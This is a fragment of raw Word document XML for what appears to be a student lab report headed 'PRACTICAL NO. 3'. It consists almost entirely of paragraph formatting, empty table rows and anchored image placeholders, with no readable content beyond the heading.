    <w:p w14:paraId="1DD43BA8" w14:textId="6707AA30" w:rsidR="0094614E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18EC39" w14:textId="532B190D" w:rsidR="002E696A" w:rsidRDefault="002E696A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CF977" w14:textId="6AAB19BA" w:rsidR="002E696A" w:rsidRDefault="002E696A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06EA0F" w14:textId="414E1418" w:rsidR="002E696A" w:rsidRDefault="002E696A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5C3F8" w14:textId="3A1BE679" w:rsidR="002E696A" w:rsidRDefault="002E696A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580A7" w14:textId="6005788F" w:rsidR="002E696A" w:rsidRDefault="002E696A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EE362" w14:textId="039613DA" w:rsidR="002E696A" w:rsidRDefault="002E696A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43F3B" w14:textId="7F7A7446" w:rsidR="002E696A" w:rsidRDefault="002E696A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BAA54" w14:textId="77777777" w:rsidR="002E696A" w:rsidRPr="00BB6EDB" w:rsidRDefault="002E696A" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72015859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38A730A4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101C30C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3BA45111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9C6CB60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4A74EAC8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25FCA62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FE3CF45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127DE27D" w14:textId="46D3B148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4244E9CD" w14:textId="77777777" w:rsidR="00F13AE7" w:rsidRDefault="00F13AE7" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E638D64" w14:textId="37171996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C3D540E" w14:textId="27CE5848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321D88AA" w14:textId="3210B8AD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4689934C" w14:textId="6368B383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42BB8966" w14:textId="408B86BE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43BCFBEB" w14:textId="77777777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2D8B35AF" w14:textId="2F2C796F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583B56DD" w14:textId="77803752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CD7393B" w14:textId="7777777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407CC4C" w14:textId="4A35642A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7D506FF4" w14:textId="11E3D589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6C839FD7" w14:textId="1097E85B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24B0A992" w14:textId="697835DA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6BC02782" w14:textId="6035F141" w:rsidR="001374F1" w:rsidRDefault="001374F1" w:rsidP="002E69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00113D9C" w14:textId="408FCE0B" w:rsidR="002E696A" w:rsidRDefault="002E696A" w:rsidP="002E696A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E6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 wp14:anchorId="705ECF04" wp14:editId="67E04845">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1568507</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="3834130"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="128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834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4B7654" w14:textId="22417BD3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28AB8802" w14:textId="427C5AC1" w:rsidR="001374F1" w:rsidRDefault="002E696A" w:rsidP="002E69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52DD320" w14:textId="29FC103F" w:rsidR="002E696A" w:rsidRDefault="002E696A" w:rsidP="002E696A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A3D087" w14:textId="4607FFFA" w:rsidR="002E696A" w:rsidRPr="002E696A" w:rsidRDefault="002E696A" w:rsidP="002E696A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E6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5A57517A" wp14:editId="3A976D74">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6631949</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4429125" cy="1905000"/>
            <wp:effectExtent l="76200" t="76200" r="142875" b="133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F47846" w14:textId="28B70D51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1186A7E2" w14:textId="75E33934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29167142" w14:textId="5D03C412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7485D13C" w14:textId="4CB8DDD0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6B224781" w14:textId="1D1E22FE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283118F5" w14:textId="7E9728B2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08012FA0" w14:textId="308CC373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2332E0B4" w14:textId="71E32FA1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33A73650" w14:textId="30DB7A99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6EFB09C2" w14:textId="2FB250F0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69A48177" w14:textId="13926F81" w:rsidR="002E696A" w:rsidRDefault="002E696A" w:rsidP="002E696A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D7CB98" w14:textId="7FAA8033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1C0DEAD0" w14:textId="0A51E6F4" w:rsidR="002E696A" w:rsidRDefault="002E696A" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0315E394" w14:textId="79C85C6F" w:rsidR="000E1F33" w:rsidRDefault="000E1F33" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F0DC83" w14:textId="29FC7291" w:rsidR="000E1F33" w:rsidRPr="00BB6EDB" w:rsidRDefault="000E1F33" w:rsidP="000E1F3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168F0CF5" w14:textId="54C3E0FE" w:rsidR="000E1F33" w:rsidRDefault="00F13AE7" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1F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4695D77B" wp14:editId="0222B7B4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>199030</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1883011</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4029075" cy="2914650"/>
            <wp:effectExtent l="76200" t="76200" r="142875" b="133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0BCE4E" w14:textId="0117893D" w:rsidR="000E1F33" w:rsidRDefault="000E1F33" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BDEC29" w14:textId="2B19D2DD" w:rsidR="002E696A" w:rsidRDefault="002E696A" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18BB2654" w14:textId="5EBA2746" w:rsidR="002E696A" w:rsidRDefault="002E696A" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2681A291" w14:textId="77777777" w:rsidR="002E696A" w:rsidRDefault="002E696A" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A278E1" w14:textId="7E03FB6B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79D13419" w14:textId="69C8A993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521E6E67" w14:textId="747E44E0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2B252EF3" w14:textId="4C86F792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70D466F7" w14:textId="1F7F0426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66CEE75D" w14:textId="2A8ED884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451511DA" w14:textId="77777777" w:rsidR="001374F1" w:rsidRDefault="001374F1" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0FC66F" w14:textId="3140BBCB" w:rsidR="0094614E" w:rsidRDefault="0094614E"/>
    <w:p w14:paraId="1B71242E" w14:textId="56105959" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="4C408F5C" w14:textId="63C8A911" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="240AD98E" w14:textId="4F48D109" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="378825CE" w14:textId="7D1F1A03" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="2D35DE8D" w14:textId="06A78BA3" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="64A49978" w14:textId="19A085B6" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="3E3646EC" w14:textId="434BA13A" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="47751193" w14:textId="713016A1" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="5CE123B6" w14:textId="4423D575" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="2DC0C944" w14:textId="57F5EE6C" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="10C89255" w14:textId="79A28C56" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="6BEEA7B1" w14:textId="3DA4133C" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="5A82A7DB" w14:textId="616E6C33" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="6439D317" w14:textId="19640F25" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="2EA5C699" w14:textId="28C0B25A" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="0386E736" w14:textId="6960C527" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="40784E65" w14:textId="626461BD" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="400682D3" w14:textId="54D5B975" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="2D50D987" w14:textId="2891617E" w:rsidR="000E1F33" w:rsidRDefault="000E1F33" w:rsidP="000E1F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11B5DDF9" w14:textId="16C5B20A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1EA63AE7" w14:textId="77777777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09114957" w14:textId="13C599B4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  <w:r w:rsidRPr="000E1F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48817C38" wp14:editId="2D6B987C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1787307</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="2483485"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="12636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483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3744B3" w14:textId="0586CF70" w:rsidR="000E1F33" w:rsidRDefault="000E1F33" w:rsidP="000E1F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1E538CC7" w14:textId="77777777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064C6A9D" w14:textId="1D46A5FA" w:rsidR="000E1F33" w:rsidRPr="002E696A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3CA2C4FA" w14:textId="3A5A3200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  <w:r w:rsidRPr="002E6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4049A81D" wp14:editId="313CFD19">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5649301</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4429125" cy="1905000"/>
            <wp:effectExtent l="76200" t="76200" r="142875" b="133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6B90A6" w14:textId="77777777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7899045F" w14:textId="0E1B3F1F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2149A913" w14:textId="63850A61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21E7FB6C" w14:textId="77777777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5BA51694" w14:textId="77777777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67601C61" w14:textId="77777777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6D2DB5AA" w14:textId="77777777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0D9F2157" w14:textId="77777777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2CCEAD58" w14:textId="0BC66C6C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19843B05" w14:textId="112D630C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1B4E8A58" w14:textId="37BB4A66" w:rsidR="000E1F33" w:rsidRDefault="000E1F33" w:rsidP="000E1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27220D36" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRDefault="006E2B58" w:rsidP="000E1F33">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDCDF4A" w14:textId="77777777" w:rsidR="000E1F33" w:rsidRDefault="000E1F33" w:rsidP="000E1F33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2638B16B" w14:textId="77777777" w:rsidR="000E1F33" w:rsidRDefault="000E1F33"/>
    <w:p w14:paraId="62E23520" w14:textId="77777777" w:rsidR="0094614E" w:rsidRDefault="0094614E"/>
    <w:p w14:paraId="1A755777" w14:textId="1D7F0D59" w:rsidR="00C04558" w:rsidRDefault="00C04558" w:rsidP="00C045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840512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E33F1B6" wp14:editId="0F687632">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1717210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="4965700"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="1397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2-21 1328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96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31E9F416" w14:textId="344B6467" w:rsidR="00C04558" w:rsidRDefault="00C04558" w:rsidP="00C04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CA7ED" w14:textId="72A44416" w:rsidR="000E1F33" w:rsidRDefault="000E1F33" w:rsidP="00C045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126E6B" w14:textId="77777777" w:rsidR="000E1F33" w:rsidRDefault="000E1F33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92C7C5" w14:textId="77777777" w:rsidR="000E1F33" w:rsidRDefault="000E1F33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A713BB" w14:textId="77777777" w:rsidR="000E1F33" w:rsidRDefault="000E1F33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3C71B1" w14:textId="77777777" w:rsidR="000E1F33" w:rsidRDefault="000E1F33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77FFA5" w14:textId="6061A882" w:rsidR="000E1F33" w:rsidRDefault="000E1F33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8A5F8A" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRDefault="006E2B58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224E9" w14:textId="77777777" w:rsidR="000E1F33" w:rsidRDefault="000E1F33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EE1FDF" w14:textId="274FDB9F" w:rsidR="000E1F33" w:rsidRDefault="000E1F33" w:rsidP="00C045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CD6083" w14:textId="243290EA" w:rsidR="0094614E" w:rsidRPr="00BB6EDB" w:rsidRDefault="0094614E" w:rsidP="009461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ECE82" wp14:editId="42B2EE8F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>283633</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6915150" cy="50800"/>
                <wp:effectExtent l="0" t="0" r="19050" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1632450645" name="Straight Connector 1632450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6A244A" id="Straight Connector 163245064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35pt" to="544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E1F33">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PRACTICAL NO. 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FC3C09" w14:textId="77777777" w:rsidR="0094614E" w:rsidRPr="00BB6EDB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6C97F2D1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4477" wp14:editId="2790BECC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>234527</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6940550" cy="6350"/>
                <wp:effectExtent l="0" t="0" r="31750" b="31750"/>
                <wp:wrapNone/>
                <wp:docPr id="293579920" name="Straight Connector 293579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F37DFE" id="Straight Connector 2935799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45pt" to="546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C4B3C0E" w14:textId="77777777" w:rsidR="0094614E" w:rsidRPr="00BB6EDB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94614E" w14:paraId="2BA975A3" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D4BAFF1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2B8975AD" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F12B3D3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2EE37D21" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53744763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1852E13B" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68441E7F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4CAE8751" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E9747E9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705AAB26" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E8A07D0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7196A3C9" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6164C2EB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5F50648F" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B163DDF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5A9F7498" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A2EA5E8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14E" w14:paraId="2F8861EC" w14:textId="77777777" w:rsidTr="00AB66A5">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3248D7B7" w14:textId="77777777" w:rsidR="0094614E" w:rsidRDefault="0094614E" w:rsidP="00AB6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1576E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023CF63" w14:textId="77777777" w:rsidR="0094614E" w:rsidRPr="00BB6EDB" w:rsidRDefault="0094614E" w:rsidP="009461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061A7B9A" w14:textId="35F2D7A9" w:rsidR="0094614E" w:rsidRPr="000E1F33" w:rsidRDefault="0094614E" w:rsidP="000E1F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14:paraId="41046BA2" w14:textId="4CDEEDD7" w:rsidR="0094614E" w:rsidRPr="00BB6EDB" w:rsidRDefault="000E1F33" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1F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7228739F" wp14:editId="540294AB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>231140</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7259898</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4934585" cy="2314575"/>
            <wp:effectExtent l="76200" t="76200" r="132715" b="1428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FB1201" w14:textId="462D2485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A645F28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5B8B9B84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695E3AB8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FB9570D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61F708A9" w14:textId="0C891CE2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5D142E1C" w14:textId="7AB2987D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6A39C588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455BD8AF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6F948916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305C1731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57F27290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B21EE42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FBE1BB1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B39143E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47CA582E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38A5A564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45C6CE83" w14:textId="77777777" w:rsidR="0094614E" w:rsidRPr="00BB6EDB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76ED419E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6FB35ED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6E506B62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1E3487D7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604BF2AF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5CAA0A86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262A68D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1D9C29F8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B02D229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064528D1" w14:textId="77777777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18C49DC3" w14:textId="06BDAF59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D01F0FE" w14:textId="60800294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9EFD29D" w14:textId="706FAB9F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717E3C2" w14:textId="7777777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3E8704E8" w14:textId="5A242742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3802F135" w14:textId="63EC5D1C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7DBCF9B9" w14:textId="55C52664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411F7017" w14:textId="019F1840" w:rsidR="00577337" w:rsidRPr="00577337" w:rsidRDefault="00577337" w:rsidP="005773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14:paraId="3F79606F" w14:textId="62EEBBF5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31296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F008B3F" wp14:editId="1F35E9C0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>325755</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1432285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3101340" cy="2647315"/>
            <wp:effectExtent l="76200" t="76200" r="137160" b="133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2-21 1316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647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A1FC" w14:textId="5D3AD00C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62DDD637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289ADAB9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58B23434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03F2ECBA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0655BCDC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4C850677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48DAB885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4818BD65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70B580F9" w14:textId="1E09397A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428A154F" w14:textId="154EFDEA" w:rsidR="00577337" w:rsidRPr="00577337" w:rsidRDefault="00577337" w:rsidP="005773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14:paraId="775E95BA" w14:textId="7729D092" w:rsidR="00577337" w:rsidRDefault="0044408E" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005773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1EB58124" wp14:editId="4F7DB0A0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>311510</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4884420</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4314825" cy="2381250"/>
            <wp:effectExtent l="76200" t="76200" r="142875" b="133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EF054E" w14:textId="13D0A2B5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075EB1A8" w14:textId="4FB9AC7F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5AEEA5F4" w14:textId="10616CF1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049D113A" w14:textId="18AA8FFA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65B6AC7F" w14:textId="77777777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74FD87FF" w14:textId="1499C9DA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5574BEA6" w14:textId="5C47F456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0FC36D81" w14:textId="73AD0A88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3506B38D" w14:textId="5D22EE21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08E718B5" w14:textId="126FC949" w:rsidR="00577337" w:rsidRPr="00577337" w:rsidRDefault="00F13AE7" w:rsidP="005773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33344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="748B33E8" wp14:editId="3699EB00">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>280301</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7969875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5372735" cy="2066925"/>
            <wp:effectExtent l="76200" t="76200" r="132715" b="1428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2-21 1321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289B2C" w14:textId="0920060C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61BD6007" w14:textId="5079FFF0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735C6FD4" w14:textId="3C3B0975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3FE6A7A5" w14:textId="0EBA2C20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173B9088" w14:textId="63248121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0A7AB305" w14:textId="20328D1A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4E5BE075" w14:textId="35BEC351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7257D9F5" w14:textId="2F517C8C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6423DA1A" w14:textId="4E731014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F3CBA0A" w14:textId="47B9E541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419CBD5D" w14:textId="35196EF4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BC25C23" w14:textId="5A5567DB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197E1ECB" w14:textId="16700A3F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6345C4B6" w14:textId="0698724E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165DB4D" w14:textId="5B9ADEF4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5F682981" w14:textId="3A0D2529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55773EE" w14:textId="270749BA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5DA43D5C" w14:textId="00D2D5A2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335A47D9" w14:textId="298318D1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55BC5C2" w14:textId="4CBE6BAB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40356C8E" w14:textId="5C925542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74DD9E5D" w14:textId="4762F344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335F10A1" w14:textId="610DBC8A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6706E1FB" w14:textId="0E1850F3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55E629EE" w14:textId="79E37D61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74DDDFD" w14:textId="7149EE2D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3C432830" w14:textId="77698C61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73B685D" w14:textId="2D1F8CD5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2E6A8113" w14:textId="46E68A7F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155C06C0" w14:textId="067BBAB6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17EC5174" w14:textId="3A8939A8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3D75B401" w14:textId="7777777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904430B" w14:textId="77777777" w:rsidR="00C04558" w:rsidRDefault="00C04558" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A24BC3" w14:textId="1EE924E2" w:rsidR="00577337" w:rsidRDefault="00577337" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F775145" w14:textId="1186FB09" w:rsidR="00577337" w:rsidRPr="0044408E" w:rsidRDefault="00577337" w:rsidP="004440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14:paraId="7BFF2D4D" w14:textId="0259559A" w:rsidR="0044408E" w:rsidRDefault="00C04558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34368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28F096FC" wp14:editId="28F2F977">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>176265</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1909435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="2202180"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="1409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02-21 1321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D066EE" w14:textId="3169F939" w:rsidR="0044408E" w:rsidRPr="0044408E" w:rsidRDefault="0044408E" w:rsidP="00C045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C90D7A" w14:textId="7FA1CD08" w:rsidR="0044408E" w:rsidRDefault="0044408E" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CBBB36B" w14:textId="7845ECDF" w:rsidR="0094614E" w:rsidRDefault="0094614E" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9D2E42" w14:textId="5E92C49E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3F8DD829" w14:textId="63B9BD8E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67A9CA20" w14:textId="70B02B0C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31705B61" w14:textId="50D31C6B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4DF60F62" w14:textId="3839978E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1477E354" w14:textId="605D13A6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6DC7BA9E" w14:textId="6D083675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6F1E1CD0" w14:textId="36E74F23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62D3B5E6" w14:textId="7735B6FD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62B9F228" w14:textId="77B965ED" w:rsidR="006E6C94" w:rsidRDefault="006E6C94" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E882C50" w14:textId="0040829C" w:rsidR="006E6C94" w:rsidRDefault="006E6C94" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
